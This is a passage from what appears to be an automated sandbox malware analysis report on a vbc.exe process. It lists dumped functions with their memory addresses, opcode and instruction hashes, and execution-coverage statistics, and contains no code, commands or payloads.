                                                    • Instruction Fuzzy Hash: 19119671A0D3D45FD7228F7A4C51956BFB99F8761030A40EBE544CF263D920CC09C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0018D1CF, Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483615473.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_18d000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f3aa95179fc39f5a28a4e7e43a98a9d2df4162a87b6c428829bacabebdc3b3b4
                                                    • Instruction ID: 94ac23e4e9b40af5977799d0b58cc5b71c11686b2942ef71307606b4e868b86f
                                                    • Opcode Fuzzy Hash: f3aa95179fc39f5a28a4e7e43a98a9d2df4162a87b6c428829bacabebdc3b3b4
                                                    • Instruction Fuzzy Hash: 5311BB75904284DFCB02DF10E5C4B15BBA2FB84314F28C6A9D8094B296C33AD90ACF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0018D017, Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483615473.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_18d000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f3aa95179fc39f5a28a4e7e43a98a9d2df4162a87b6c428829bacabebdc3b3b4
                                                    • Instruction ID: eaeae316e7d10e0bab9d2d707baf0bc3644ab65fa2821b2f4df6a88bc7a27afc
                                                    • Opcode Fuzzy Hash: f3aa95179fc39f5a28a4e7e43a98a9d2df4162a87b6c428829bacabebdc3b3b4
                                                    • Instruction Fuzzy Hash: E411BE75504384CFCB11DF10E584B15BB61FB44314F24C6A9E8094B696C33AD90ACFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E1E0F, Relevance: .1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1fdf6a3cf8591c64347aed85a5dd303b7526742862ae45e5d222f081cd6ea1db
                                                    • Instruction ID: 374b8e0e4c6d9b8700baa774ea10ec7b71b6940242cf6385ebadacfd0b0da1c5
                                                    • Opcode Fuzzy Hash: 1fdf6a3cf8591c64347aed85a5dd303b7526742862ae45e5d222f081cd6ea1db
                                                    • Instruction Fuzzy Hash: 00011B757500504F8788EB7DD558D2E37E39F8D21436201B8E60ADB362DE20DD568B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E1E10, Relevance: .1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ae05af3f575a5d918bacd7dfc1b8c2c9a9485f5c7c6d80a395f3ac24eb1f6f6
                                                    • Instruction ID: 7edd99d14e0e82716caf7222123ff057219914e07e3dca937349c48c2e4000e7
                                                    • Opcode Fuzzy Hash: 1ae05af3f575a5d918bacd7dfc1b8c2c9a9485f5c7c6d80a395f3ac24eb1f6f6
                                                    • Instruction Fuzzy Hash: BA0129757501508F8788EB7DD558D2E37E7AF8D22436200B8E60ADB362EF30ED568B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E00E4, Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1988f2a6a84d5468851c8deb0d8922985c4b24caad2017a95058aba8aff70037
                                                    • Instruction ID: 87bae0b66573d3db42b8faf3f8224913e40ddfceeee38208fe006ae8a58ecf6b
                                                    • Opcode Fuzzy Hash: 1988f2a6a84d5468851c8deb0d8922985c4b24caad2017a95058aba8aff70037
                                                    • Instruction Fuzzy Hash: DB0192316142108BC744EF3AD890AADB396FFC9304B5584B9E90E9F226DB349C05C7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E4EF0, Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f4bf0b92e0dcd3c87d972259b3ee56343bf4dcff31559e26095564757e83a6bf
                                                    • Instruction ID: bd1ab0a68aca14dea079d3efb96a7ecee60610bf3cdae055b5bf54bee0da1490
                                                    • Opcode Fuzzy Hash: f4bf0b92e0dcd3c87d972259b3ee56343bf4dcff31559e26095564757e83a6bf
                                                    • Instruction Fuzzy Hash: 19014B3052D3C58FC353ABB998A88687F70EE0360536A45DBD0D5CB5FBD2288909C712
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E1F19, Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c92affd5bc73fb4671889d6717bd5f296282fd76bed85271bbe3f76f6d5b19ef
                                                    • Instruction ID: 887ea0f7d021a6d55d86457d2ee2bd7ec0b452e2af684466fa7ca9dde5a4ba97
                                                    • Opcode Fuzzy Hash: c92affd5bc73fb4671889d6717bd5f296282fd76bed85271bbe3f76f6d5b19ef
                                                    • Instruction Fuzzy Hash: 2901BC353580904FC789EB7C9894D2D3BF29FCD21436601B9E54ADB3B3EE209E568B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000CD1C1, Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483583276.00000000000CD000.00000040.00000001.sdmp, Offset: 000CD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_cd000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8fa6b42ae1d633e81369a0d271ce0ed12e155894c6a3337e8eae114b9c2b91a
                                                    • Instruction ID: b9ffa1086d8b555437e3cb7b39324428d6bcad899ee2e7bc5281190f361545f0
                                                    • Opcode Fuzzy Hash: f8fa6b42ae1d633e81369a0d271ce0ed12e155894c6a3337e8eae114b9c2b91a
                                                    • Instruction Fuzzy Hash: 45018471008644AAD7A15B15C884F6FBBD8DF51764F28846FEE445A286C378DC40C6B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E0720, Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b8d6be1da1a032ace8e0fa103f5cf865e0e38f2267c659e28f2acf404a3bc622
                                                    • Instruction ID: 67389391b632af767e2ff4e50d605cc4e4bede0a1e94825b96775c444481b851
                                                    • Opcode Fuzzy Hash: b8d6be1da1a032ace8e0fa103f5cf865e0e38f2267c659e28f2acf404a3bc622
                                                    • Instruction Fuzzy Hash: FA017134A502498BDB14DBA5C594BEEBBF5AB4C304F64002AD401F7784DBB5A985CFE0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E1EA9, Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f56f14015a4daafe66bf2163e562bc1438e7ed389e78d4e5ed6126bdfd35b738
                                                    • Instruction ID: a99731cb2047a04893c96e1a063c338bf003aec5953161b917b7c6b7ecd379b4
                                                    • Opcode Fuzzy Hash: f56f14015a4daafe66bf2163e562bc1438e7ed389e78d4e5ed6126bdfd35b738
                                                    • Instruction Fuzzy Hash: 970181357442904FC746AB3D981491D3BF2DFCA25031600AAE945DB362EE30AE55CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E1F28, Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3aac3e4032da1737eeac60314a9c13da7b62d1b2b0477c04be9c866e8eb2d32f
                                                    • Instruction ID: 549ff5f32a49eb6b0ae42d8cb8cf5f1eea6ead54b22f83e8baeb3a5e40b40936
                                                    • Opcode Fuzzy Hash: 3aac3e4032da1737eeac60314a9c13da7b62d1b2b0477c04be9c866e8eb2d32f
                                                    • Instruction Fuzzy Hash: DEF019353500508F8388EB7CD458D2E36E69F8C6243520178E60ADB362EF20DE568B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E2860, Relevance: .0, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a8ad220cfd12471d63fe6cc157b08fd0114444e9e26a98a2bedb75b61070c4e
                                                    • Instruction ID: 72aa840db31f43c095cd12713b20b36a9c5da33e3ef2ed816e892453fb254269
                                                    • Opcode Fuzzy Hash: 3a8ad220cfd12471d63fe6cc157b08fd0114444e9e26a98a2bedb75b61070c4e
                                                    • Instruction Fuzzy Hash: D0F0C232A141508FCB14DF2BD8C0DEEB795AFD8304B4881B9D90DDF126DA708C058AA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000CD1C0, Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483583276.00000000000CD000.00000040.00000001.sdmp, Offset: 000CD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_cd000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f82cf7efccb92392a80d9f27d545434c5c8501280c35e508f17b291789f3ae5a
                                                    • Instruction ID: 020626c27c839660481fb88ae924a51a53563fc975ab60a742b176688831e972
                                                    • Opcode Fuzzy Hash: f82cf7efccb92392a80d9f27d545434c5c8501280c35e508f17b291789f3ae5a
                                                    • Instruction Fuzzy Hash: 95F0AF71004644AAE7508B05D888B66FFD8EBA1764F18C45EED081B286C3789C40CAB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E18A4, Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2f45a5f316a6d9ba4761a86c4289475485c625f5049aeb6c418ec2ada4f84ac
                                                    • Instruction ID: 18b3e191f0c1a2074e6cd039d1ea52655325afe59eedcb8b00049f8d74b8fef7
                                                    • Opcode Fuzzy Hash: b2f45a5f316a6d9ba4761a86c4289475485c625f5049aeb6c418ec2ada4f84ac
                                                    • Instruction Fuzzy Hash: F6F020317401445EDB04FA7BAC84CAA7BEACF89344B414078E201D32A1EB3088248A81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E934C, Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1abac364bf69851389c4bed785d85f7406515e3a834fbacc0b164fe417b69654
                                                    • Instruction ID: b1032e05b5cb35e11a7a51fba74e5e57936e332dd20d7ea0808e81a1b27255aa
                                                    • Opcode Fuzzy Hash: 1abac364bf69851389c4bed785d85f7406515e3a834fbacc0b164fe417b69654
                                                    • Instruction Fuzzy Hash: E3018B749592C99FDF00DF64DC487DDBBB0BB06305F1004ABD686A6295CBB50884CF29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E0438, Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9b3f4fcc70bb8ff340f3543b092ecd8a3c48388602904584737abb24a26ac6d9
                                                    • Instruction ID: ea69e87ed52300b52c6fa4aa41850b0d7339d6065a91dc5bbd04b34a3dfa9a79
                                                    • Opcode Fuzzy Hash: 9b3f4fcc70bb8ff340f3543b092ecd8a3c48388602904584737abb24a26ac6d9
                                                    • Instruction Fuzzy Hash: 6EF0A72030C2D01FC71A63B5581576E3FDA4F8645171940AFD14ACB6E3DF255D0983A6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E4E90, Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 48aade6fffce7ff81ea845b7a7916d8cfec27683ed8b600e11110dba56a1c0dd
                                                    • Instruction ID: dd6db962cf6dae46bd8f3edd2885f904353646bf877d85f550a2473837d17bcb
                                                    • Opcode Fuzzy Hash: 48aade6fffce7ff81ea845b7a7916d8cfec27683ed8b600e11110dba56a1c0dd
                                                    • Instruction Fuzzy Hash: 1EF0A0393000515FC744F76EE401EAE73DA9BC92547599069E10ACB76AEF20DD0ACBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E93B6, Relevance: .0, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 63090d4caa6e73eacc46074871f926aa5a39210713177770f327ee3463452a8d
                                                    • Instruction ID: ac7c38b11da09668aa58b981ac2fabb2d729c906f2197478cd779acf815d9e6b
                                                    • Opcode Fuzzy Hash: 63090d4caa6e73eacc46074871f926aa5a39210713177770f327ee3463452a8d
                                                    • Instruction Fuzzy Hash: E1011474900249CFDB50EFA4D848BACBBB1FB09311F1080AAD40AA7395CB705DC4CF64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E0448, Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d288a3a15b982495d9f53ea7a9b798105a3933a375f996e6299e238e5e8eeb77
                                                    • Instruction ID: 0f1c908e0f4deb8f67b3280c6543a970c4fb2feb0044ece98065bb0d5d7a364e
                                                    • Opcode Fuzzy Hash: d288a3a15b982495d9f53ea7a9b798105a3933a375f996e6299e238e5e8eeb77
                                                    • Instruction Fuzzy Hash: 0AE08631340065678A5C33F59815A2F71CA8BC4555311803EE61FC7791DF268D0247E6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E5927, Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e13bba3cdf3138c61c1ee063edcf20c46381f4710ddff3cdab31eca329225ba5
                                                    • Instruction ID: 7b89755fd329a6692ed8de2ed73c1f2de137af63ccd024f9ef447798ac4081cf
                                                    • Opcode Fuzzy Hash: e13bba3cdf3138c61c1ee063edcf20c46381f4710ddff3cdab31eca329225ba5
                                                    • Instruction Fuzzy Hash: 29E06D30A29381CFC702577898245B97AE25F06318F5985E6D5A18F2E3DB348D59C762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E15F1, Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b313bdf45c8ec37926c5b0040740d19d091ba3585a5333336e461c9e6a3c95f0
                                                    • Instruction ID: 33ee349e02766a4e922da29b5a3cb88292c68995d04c81d2d26eae5fb1f44635
                                                    • Opcode Fuzzy Hash: b313bdf45c8ec37926c5b0040740d19d091ba3585a5333336e461c9e6a3c95f0
                                                    • Instruction Fuzzy Hash: 99E09A30909388AFCB12EFB4E81085DBFB4EF83200B1546EFD444E7292EA301F049B52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002EC07E, Relevance: .0, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2733ac0a3b12662ee23456160972f96adfe8dc724e4518e7d2c1e9c1eda4aa82
                                                    • Instruction ID: 75eaf150ada00530500f1d2f51ccfdefdea45681607cb32c876e06a366d3c1b1
                                                    • Opcode Fuzzy Hash: 2733ac0a3b12662ee23456160972f96adfe8dc724e4518e7d2c1e9c1eda4aa82
                                                    • Instruction Fuzzy Hash: 3EF0FFB4D54369CFCBA6CF25C940698BBF9AB59300F5091DAE41DA3211DB705F94DF00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E944D, Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9ce843c00c141820758a2b07cfeca06cc3e9b131fd7d8cf392ccceacc19445c
                                                    • Instruction ID: 5bd27df34ef09606395b6e8b3b36f8eaa47f32c2539903a1c856e0f29724a99a
                                                    • Opcode Fuzzy Hash: b9ce843c00c141820758a2b07cfeca06cc3e9b131fd7d8cf392ccceacc19445c
                                                    • Instruction Fuzzy Hash: 03E0C274921228CBEB20AFA1CC08B9CBBB1FB4A301F0002AAD50DB3294C7740E808F25
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E1600, Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1388583109843fa0a97af5dc53699f36ca041c66f1ed81834f55a9368dade795
                                                    • Instruction ID: 0b1aaac58e643c48a7c78318ecccee8ba028b5d51d3148b28c15e36235f56220
                                                    • Opcode Fuzzy Hash: 1388583109843fa0a97af5dc53699f36ca041c66f1ed81834f55a9368dade795
                                                    • Instruction Fuzzy Hash: 0ED01770A0020CEB8B50EFA8E90199DB7B9EB85204B6086A99409E3244EB312F009B81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E17D0, Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 642f82ce486c23210a4ac6af8bdf30f92dcce751fb193267b4d66626c5d72a62
                                                    • Instruction ID: fc233bdcc83937f400c1bf7eb5f54f09775717c272b56fec9166aa2b86843804
                                                    • Opcode Fuzzy Hash: 642f82ce486c23210a4ac6af8bdf30f92dcce751fb193267b4d66626c5d72a62
                                                    • Instruction Fuzzy Hash: EAB092313A42090AEAA09BF6780672672CC8780A18FC40475F40CC5D00EA56E8A01241
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 002E9A50, Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0\D
                                                    • API String ID: 0-3163925331
                                                    • Opcode ID: 7d83990e0985833e853929773f94a97f02843e347adf24a570bb8709781256ba
                                                    • Instruction ID: e614ff02143a8ef354e6355bd4e4ea24712150d1334eb24dcbefe64585f99031
                                                    • Opcode Fuzzy Hash: 7d83990e0985833e853929773f94a97f02843e347adf24a570bb8709781256ba
                                                    • Instruction Fuzzy Hash: 71517170D142488FDB54EFBAE841A9DBBF3AF89304F14D539D004AB769EB3099458BD1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E0D11, Relevance: .1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e132bea526ea08dd9552379c641606b21898df9d239be95e474534046cbfd15e
                                                    • Instruction ID: dea1f455b702b703ad6e38ea90276275afcced97dc4fd810a58bb8ce3c383775
                                                    • Opcode Fuzzy Hash: e132bea526ea08dd9552379c641606b21898df9d239be95e474534046cbfd15e
                                                    • Instruction Fuzzy Hash: EA310879E6111E8FDF10CFAAE881AADF3F2BF48304B54E215E015EB245DB31A955CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E9CA9, Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c100a01df3edf217849b206a3cee57d6bdc197301a38f23abfd144eb54298245
                                                    • Instruction ID: cc7dcf40890744c08d20b389e22c3d37e780c9b387cb885036ef6106504cc196
                                                    • Opcode Fuzzy Hash: c100a01df3edf217849b206a3cee57d6bdc197301a38f23abfd144eb54298245
                                                    • Instruction Fuzzy Hash: 5C4139B1E056588BE71CCF6B8C4069EFAF3AFC9200F14C1BA855DA6265EB3005868F55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E9CB8, Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7385485b40fa4b8d0c982e7ccc1b4a5d647648e5de344bbf254a364e6e55bba3
                                                    • Instruction ID: cd73e3084a9e73c792fbbe795811bbd9b0b2fb1072e2ff77e86d17059375a366
                                                    • Opcode Fuzzy Hash: 7385485b40fa4b8d0c982e7ccc1b4a5d647648e5de344bbf254a364e6e55bba3
                                                    • Instruction Fuzzy Hash: 343109B1E016188BEB1CCF6B8D4068EFAF7BFC8300F54C1BA890C6A225DB3005868F55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Analysis Process: vbc.exe PID: 2712 Parent PID: 2540 vbc.exeCOMMON

                                                    Execution Graph

                                                    Execution Coverage:3.5%
                                                    Dynamic/Decrypted Code Coverage:2.4%
                                                    Signature Coverage:5.8%
                                                    Total number of Nodes:583
                                                    Total number of Limit Nodes:69

                                                    Graph

